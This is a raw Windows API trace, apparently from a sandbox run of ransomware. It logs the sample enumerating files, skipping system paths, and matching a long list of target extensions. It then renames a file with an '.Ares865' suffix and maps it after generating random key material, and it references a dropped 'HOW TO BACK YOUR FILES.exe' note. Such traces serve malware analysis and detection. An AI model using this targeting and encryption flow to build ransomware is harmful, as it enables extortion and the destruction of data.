[0085.709] lstrlenW (lpString="udb") returned 3 [0085.709] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0085.709] lstrlenW (lpString="udl") returned 3 [0085.709] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0085.709] lstrlenW (lpString="usr") returned 3 [0085.709] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0085.709] lstrlenW (lpString="v12") returned 3 [0085.709] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0085.709] lstrlenW (lpString="vis") returned 3 [0085.709] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0085.709] lstrlenW (lpString="vpd") returned 3 [0085.709] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0085.709] lstrlenW (lpString="vvv") returned 3 [0085.709] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0085.710] lstrlenW (lpString="wdb") returned 3 [0085.710] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0085.710] lstrlenW (lpString="wmdb") returned 4 [0085.710] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0085.710] lstrlenW (lpString="wrk") returned 3 [0085.710] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0085.710] lstrlenW (lpString="xdb") returned 3 [0085.710] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0085.710] lstrlenW (lpString="xld") returned 3 [0085.710] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0085.710] lstrlenW (lpString="xmlff") returned 5 [0085.710] lstrcmpiW (lpString1="y.ico", lpString2="xmlff") returned 1 [0085.710] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico.Ares865") returned 66 [0085.710] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\documentrepository.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\documentrepository.ico.ares865"), dwFlags=0x1) returned 1 [0085.711] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\documentrepository.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.711] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25214) returned 1 [0085.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0085.711] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0085.712] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.712] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.712] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6580, lpName=0x0) returned 0x15c [0085.714] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6580) returned 0x190000 [0085.715] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0085.716] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.716] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.716] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.716] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.716] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.716] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.716] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.716] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.716] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0085.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0085.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.717] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.717] CloseHandle (hObject=0x15c) returned 1 [0085.717] CloseHandle (hObject=0x118) returned 1 [0085.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0085.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.717] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c5e97a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c5e97a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0085.717] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0085.717] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2bfbd800, ftCreationTime.dwHighDateTime=0x1c9facb, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2bfbd800, ftLastWriteTime.dwHighDateTime=0x1c9facb, nFileSizeHigh=0x0, nFileSizeLow=0x5532e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MySharePoints.ico", cAlternateFileName="MYSHAR~1.ICO")) returned 1 [0085.717] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.717] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="aoldtz.exe") returned 1 [0085.718] lstrcmpiW (lpString1="MySharePoints.ico", lpString2=".") returned 1 [0085.718] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="..") returned 1 [0085.718] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="windows") returned -1 [0085.718] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="bootmgr") returned 1 [0085.718] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="temp") returned -1 [0085.718] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="pagefile.sys") returned -1 [0085.718] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="boot") returned 1 [0085.718] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="ids.txt") returned 1 [0085.718] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="ntuser.dat") returned -1 [0085.718] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="perflogs") returned -1 [0085.718] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="MSBuild") returned 1 [0085.718] lstrlenW (lpString="MySharePoints.ico") returned 17 [0085.718] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico") returned 58 [0085.718] lstrcpyW (in: lpString1=0x2cce448, lpString2="MySharePoints.ico" | out: lpString1="MySharePoints.ico") returned="MySharePoints.ico" [0085.718] lstrlenW (lpString="MySharePoints.ico") returned 17 [0085.718] lstrlenW (lpString="Ares865") returned 7 [0085.718] lstrcmpiW (lpString1="nts.ico", lpString2="Ares865") returned 1 [0085.718] lstrlenW (lpString=".dll") returned 4 [0085.718] lstrcmpiW (lpString1="MySharePoints.ico", lpString2=".dll") returned 1 [0085.718] lstrlenW (lpString=".lnk") returned 4 [0085.718] lstrcmpiW (lpString1="MySharePoints.ico", lpString2=".lnk") returned 1 [0085.718] lstrlenW (lpString=".ini") returned 4 [0085.718] lstrcmpiW (lpString1="MySharePoints.ico", lpString2=".ini") returned 1 [0085.718] lstrlenW (lpString=".sys") returned 4 [0085.718] lstrcmpiW (lpString1="MySharePoints.ico", lpString2=".sys") returned 1 [0085.718] lstrlenW (lpString="MySharePoints.ico") returned 17 [0085.718] lstrlenW (lpString="bak") returned 3 [0085.718] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0085.718] lstrlenW (lpString="ba_") returned 3 [0085.718] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0085.718] lstrlenW (lpString="dbb") returned 3 [0085.718] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0085.718] lstrlenW (lpString="vmdk") returned 4 [0085.718] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0085.718] lstrlenW (lpString="rar") returned 3 [0085.718] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0085.718] lstrlenW (lpString="zip") returned 3 [0085.719] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0085.719] lstrlenW (lpString="tgz") returned 3 [0085.719] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0085.719] lstrlenW (lpString="vbox") returned 4 [0085.719] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0085.719] lstrlenW (lpString="vdi") returned 3 [0085.719] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0085.719] lstrlenW (lpString="vhd") returned 3 [0085.719] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0085.719] lstrlenW (lpString="vhdx") returned 4 [0085.719] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0085.719] lstrlenW (lpString="avhd") returned 4 [0085.719] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0085.719] lstrlenW (lpString="db") returned 2 [0085.719] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0085.719] lstrlenW (lpString="db2") returned 3 [0085.719] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0085.719] lstrlenW (lpString="db3") returned 3 [0085.719] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0085.719] lstrlenW (lpString="dbf") returned 3 [0085.719] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0085.719] lstrlenW (lpString="mdf") returned 3 [0085.719] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0085.719] lstrlenW (lpString="mdb") returned 3 [0085.719] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0085.719] lstrlenW (lpString="sql") returned 3 [0085.719] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0085.719] lstrlenW (lpString="sqlite") returned 6 [0085.719] lstrcmpiW (lpString1="ts.ico", lpString2="sqlite") returned 1 [0085.719] lstrlenW (lpString="sqlite3") returned 7 [0085.719] lstrcmpiW (lpString1="nts.ico", lpString2="sqlite3") returned -1 [0085.719] lstrlenW (lpString="sqlitedb") returned 8 [0085.719] lstrcmpiW (lpString1="ints.ico", lpString2="sqlitedb") returned -1 [0085.719] lstrlenW (lpString="xml") returned 3 [0085.719] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0085.719] lstrlenW (lpString="$er") returned 3 [0085.719] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0085.719] lstrlenW (lpString="4dd") returned 3 [0085.720] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0085.720] lstrlenW (lpString="4dl") returned 3 [0085.720] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0085.720] lstrlenW (lpString="^^^") returned 3 [0085.720] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0085.720] lstrlenW (lpString="abs") returned 3 [0085.720] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0085.720] lstrlenW (lpString="abx") returned 3 [0085.720] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0085.720] lstrlenW (lpString="accdb") returned 5 [0085.720] lstrcmpiW (lpString1="s.ico", lpString2="accdb") returned 1 [0085.720] lstrlenW (lpString="accdc") returned 5 [0085.720] lstrcmpiW (lpString1="s.ico", lpString2="accdc") returned 1 [0085.720] lstrlenW (lpString="accde") returned 5 [0085.720] lstrcmpiW (lpString1="s.ico", lpString2="accde") returned 1 [0085.720] lstrlenW (lpString="accdr") returned 5 [0085.720] lstrcmpiW (lpString1="s.ico", lpString2="accdr") returned 1 [0085.720] lstrlenW (lpString="accdt") returned 5 [0085.720] lstrcmpiW (lpString1="s.ico", lpString2="accdt") returned 1 [0085.720] lstrlenW (lpString="accdw") returned 5 [0085.720] lstrcmpiW (lpString1="s.ico", lpString2="accdw") returned 1 [0085.720] lstrlenW (lpString="accft") returned 5 [0085.720] lstrcmpiW (lpString1="s.ico", lpString2="accft") returned 1 [0085.720] lstrlenW (lpString="adb") returned 3 [0085.720] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0085.720] lstrlenW (lpString="adb") returned 3 [0085.720] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0085.720] lstrlenW (lpString="ade") returned 3 [0085.720] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0085.720] lstrlenW (lpString="adf") returned 3 [0085.720] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0085.720] lstrlenW (lpString="adn") returned 3 [0085.720] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0085.720] lstrlenW (lpString="adp") returned 3 [0085.720] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0085.720] lstrlenW (lpString="alf") returned 3 [0085.720] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0085.720] lstrlenW (lpString="ask") returned 3 [0085.721] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0085.721] lstrlenW (lpString="btr") returned 3 [0085.721] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0085.721] lstrlenW (lpString="cat") returned 3 [0085.721] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0085.721] lstrlenW (lpString="cdb") returned 3 [0085.721] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0085.721] lstrlenW (lpString="ckp") returned 3 [0085.721] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0085.721] lstrlenW (lpString="cma") returned 3 [0085.721] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0085.721] lstrlenW (lpString="cpd") returned 3 [0085.721] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0085.721] lstrlenW (lpString="dacpac") returned 6 [0085.721] lstrcmpiW (lpString1="ts.ico", lpString2="dacpac") returned 1 [0085.721] lstrlenW (lpString="dad") returned 3 [0085.721] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0085.721] lstrlenW (lpString="dadiagrams") returned 10 [0085.721] lstrcmpiW (lpString1="Points.ico", lpString2="dadiagrams") returned 1 [0085.721] lstrlenW (lpString="daschema") returned 8 [0085.721] lstrcmpiW (lpString1="ints.ico", lpString2="daschema") returned 1 [0085.721] lstrlenW (lpString="db-journal") returned 10 [0085.721] lstrcmpiW (lpString1="Points.ico", lpString2="db-journal") returned 1 [0085.721] lstrlenW (lpString="db-shm") returned 6 [0085.721] lstrcmpiW (lpString1="ts.ico", lpString2="db-shm") returned 1 [0085.721] lstrlenW (lpString="db-wal") returned 6 [0085.721] lstrcmpiW (lpString1="ts.ico", lpString2="db-wal") returned 1 [0085.721] lstrlenW (lpString="dbc") returned 3 [0085.721] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0085.721] lstrlenW (lpString="dbs") returned 3 [0085.721] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0085.721] lstrlenW (lpString="dbt") returned 3 [0085.721] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0085.721] lstrlenW (lpString="dbv") returned 3 [0085.721] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0085.721] lstrlenW (lpString="dbx") returned 3 [0085.721] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0085.721] lstrlenW (lpString="dcb") returned 3 [0085.722] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0085.722] lstrlenW (lpString="dct") returned 3 [0085.722] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0085.722] lstrlenW (lpString="dcx") returned 3 [0085.722] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0085.722] lstrlenW (lpString="ddl") returned 3 [0085.722] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0085.722] lstrlenW (lpString="dlis") returned 4 [0085.722] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0085.722] lstrlenW (lpString="dp1") returned 3 [0085.722] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0085.722] lstrlenW (lpString="dqy") returned 3 [0085.722] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0085.722] lstrlenW (lpString="dsk") returned 3 [0085.722] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0085.722] lstrlenW (lpString="dsn") returned 3 [0085.722] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0085.722] lstrlenW (lpString="dtsx") returned 4 [0085.722] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0085.722] lstrlenW (lpString="dxl") returned 3 [0085.722] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0085.722] lstrlenW (lpString="eco") returned 3 [0085.722] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0085.722] lstrlenW (lpString="ecx") returned 3 [0085.722] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0085.722] lstrlenW (lpString="edb") returned 3 [0085.722] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0085.722] lstrlenW (lpString="epim") returned 4 [0085.722] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0085.722] lstrlenW (lpString="fcd") returned 3 [0085.722] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0085.722] lstrlenW (lpString="fdb") returned 3 [0085.722] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0085.722] lstrlenW (lpString="fic") returned 3 [0085.722] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0085.722] lstrlenW (lpString="flexolibrary") returned 12 [0085.722] lstrcmpiW (lpString1="rePoints.ico", lpString2="flexolibrary") returned 1 [0085.722] lstrlenW (lpString="fm5") returned 3 [0085.723] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0085.723] lstrlenW (lpString="fmp") returned 3 [0085.723] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0085.723] lstrlenW (lpString="fmp12") returned 5 [0085.723] lstrcmpiW (lpString1="s.ico", lpString2="fmp12") returned 1 [0085.723] lstrlenW (lpString="fmpsl") returned 5 [0085.723] lstrcmpiW (lpString1="s.ico", lpString2="fmpsl") returned 1 [0085.723] lstrlenW (lpString="fol") returned 3 [0085.723] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0085.723] lstrlenW (lpString="fp3") returned 3 [0085.723] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0085.723] lstrlenW (lpString="fp4") returned 3 [0085.723] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0085.723] lstrlenW (lpString="fp5") returned 3 [0085.723] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0085.723] lstrlenW (lpString="fp7") returned 3 [0085.723] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0085.723] lstrlenW (lpString="fpt") returned 3 [0085.723] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0085.723] lstrlenW (lpString="frm") returned 3 [0085.723] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0085.723] lstrlenW (lpString="gdb") returned 3 [0085.723] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0085.723] lstrlenW (lpString="gdb") returned 3 [0085.723] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0085.723] lstrlenW (lpString="grdb") returned 4 [0085.723] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0085.723] lstrlenW (lpString="gwi") returned 3 [0085.723] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0085.723] lstrlenW (lpString="hdb") returned 3 [0085.723] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0085.723] lstrlenW (lpString="his") returned 3 [0085.723] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0085.723] lstrlenW (lpString="ib") returned 2 [0085.723] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0085.723] lstrlenW (lpString="idb") returned 3 [0085.723] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0085.723] lstrlenW (lpString="ihx") returned 3 [0085.724] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0085.724] lstrlenW (lpString="itdb") returned 4 [0085.724] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0085.724] lstrlenW (lpString="itw") returned 3 [0085.724] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0085.724] lstrlenW (lpString="jet") returned 3 [0085.724] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0085.724] lstrlenW (lpString="jtx") returned 3 [0085.724] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0085.724] lstrlenW (lpString="kdb") returned 3 [0085.724] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0085.724] lstrlenW (lpString="kexi") returned 4 [0085.724] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0085.724] lstrlenW (lpString="kexic") returned 5 [0085.724] lstrcmpiW (lpString1="s.ico", lpString2="kexic") returned 1 [0085.724] lstrlenW (lpString="kexis") returned 5 [0085.724] lstrcmpiW (lpString1="s.ico", lpString2="kexis") returned 1 [0085.724] lstrlenW (lpString="lgc") returned 3 [0085.724] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0085.724] lstrlenW (lpString="lwx") returned 3 [0085.724] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0085.724] lstrlenW (lpString="maf") returned 3 [0085.724] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0085.724] lstrlenW (lpString="maq") returned 3 [0085.724] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0085.724] lstrlenW (lpString="mar") returned 3 [0085.724] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0085.724] lstrlenW (lpString="marshal") returned 7 [0085.724] lstrcmpiW (lpString1="nts.ico", lpString2="marshal") returned 1 [0085.724] lstrlenW (lpString="mas") returned 3 [0085.724] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0085.724] lstrlenW (lpString="mav") returned 3 [0085.724] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0085.724] lstrlenW (lpString="maw") returned 3 [0085.724] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0085.724] lstrlenW (lpString="mdbhtml") returned 7 [0085.724] lstrcmpiW (lpString1="nts.ico", lpString2="mdbhtml") returned 1 [0085.724] lstrlenW (lpString="mdn") returned 3 [0085.725] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0085.725] lstrlenW (lpString="mdt") returned 3 [0085.725] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0085.725] lstrlenW (lpString="mfd") returned 3 [0085.725] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0085.725] lstrlenW (lpString="mpd") returned 3 [0085.725] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0085.725] lstrlenW (lpString="mrg") returned 3 [0085.725] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0085.725] lstrlenW (lpString="mud") returned 3 [0085.725] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0085.725] lstrlenW (lpString="mwb") returned 3 [0085.725] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0085.725] lstrlenW (lpString="myd") returned 3 [0085.725] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0085.725] lstrlenW (lpString="ndf") returned 3 [0085.725] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0085.725] lstrlenW (lpString="nnt") returned 3 [0085.725] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0085.725] lstrlenW (lpString="nrmlib") returned 6 [0085.725] lstrcmpiW (lpString1="ts.ico", lpString2="nrmlib") returned 1 [0085.725] lstrlenW (lpString="ns2") returned 3 [0085.725] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0085.725] lstrlenW (lpString="ns3") returned 3 [0085.725] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0085.725] lstrlenW (lpString="ns4") returned 3 [0085.725] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0085.725] lstrlenW (lpString="nsf") returned 3 [0085.725] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 [0085.725] lstrlenW (lpString="nv") returned 2 [0085.725] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0085.725] lstrlenW (lpString="nv2") returned 3 [0085.725] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0085.725] lstrlenW (lpString="nwdb") returned 4 [0085.725] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0085.725] lstrlenW (lpString="nyf") returned 3 [0085.725] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0085.725] lstrlenW (lpString="odb") returned 3 [0085.725] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0085.726] lstrlenW (lpString="odb") returned 3 [0085.726] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0085.726] lstrlenW (lpString="oqy") returned 3 [0085.726] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0085.726] lstrlenW (lpString="ora") returned 3 [0085.726] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0085.726] lstrlenW (lpString="orx") returned 3 [0085.726] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0085.726] lstrlenW (lpString="owc") returned 3 [0085.726] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0085.726] lstrlenW (lpString="p96") returned 3 [0085.726] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0085.726] lstrlenW (lpString="p97") returned 3 [0085.726] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0085.726] lstrlenW (lpString="pan") returned 3 [0085.726] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0085.726] lstrlenW (lpString="pdb") returned 3 [0085.726] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0085.726] lstrlenW (lpString="pdm") returned 3 [0085.726] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0085.726] lstrlenW (lpString="pnz") returned 3 [0085.726] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0085.726] lstrlenW (lpString="qry") returned 3 [0085.726] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0085.726] lstrlenW (lpString="qvd") returned 3 [0085.726] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0085.726] lstrlenW (lpString="rbf") returned 3 [0085.726] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0085.726] lstrlenW (lpString="rctd") returned 4 [0085.726] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0085.726] lstrlenW (lpString="rod") returned 3 [0085.726] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0085.726] lstrlenW (lpString="rodx") returned 4 [0085.726] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0085.726] lstrlenW (lpString="rpd") returned 3 [0085.726] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0085.726] lstrlenW (lpString="rsd") returned 3 [0085.727] lstrcmpiW (lpString1="ico", 